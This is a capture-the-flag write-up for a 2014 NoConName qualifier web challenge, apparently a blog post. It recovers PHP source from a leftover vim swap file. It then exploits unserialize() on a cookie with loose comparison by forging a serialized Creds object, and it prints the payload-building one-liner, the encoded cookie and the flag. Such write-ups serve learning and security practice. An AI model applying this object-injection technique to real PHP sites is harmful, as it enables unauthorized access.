15 September 2014

NOCONNAME CTF QUALS 2014: MakeMeFeeWet^Hb WRITEUP

Access == Flag
https://ctf.noconname.org/makemefeelweb/



we've got a web form and we know bypassing that form means getting the flag
checking out the page source we see this


it's comment from vim, so maby vim was used to develop this script so there might be some vim backup files
the form is being submitted to login.php
the only backup file i've found was .login.php.swp
after downloading it

 st3phn@x0 ~/test $ strings login.php.swp  
 b0VIM 7.4  
 /ncn/web1/login.php  
 3210#"!   
           @$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));  
      if (isset($_COOKIE['JSESSIONID'])) {  
           if ($username == "p00p" && $password == "l!k34b4u5") {  
                $this->p = $_passwd;  
                $this->u = $_uname;  
           public function __construct($_uname, $_passwd) {  
           public $p;  
           public $u;  
      class Creds {  


it's incomplete but seems enough code to do the job
there's an obvious username and password, i've tried them and i've got trolled
going more there's some check for a cookie called JSESSIONID,
GET /makemefeelweb/login.php with COOKIE: JSESSIONID=whatever; we get message saying that we're on the right track
so let's go further,
there's unserialize function which is known with possibility of initating objects
after few attempts i've reinitiated Creds class with $u=true and $p=true assuming that there's == comparaison and it worked !
so

  class Creds {public $p = true;public $u = true;} $a=new creds;echo base64_encode(bin2hex(serialize($a)));

Output :
NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=

sending the output from this lill php chizzle to login.php in JSESSIONID cookie
bingo ! we got some flag !


NcN_778064be6556e64577517875a8710b0abeba1578




1 comment: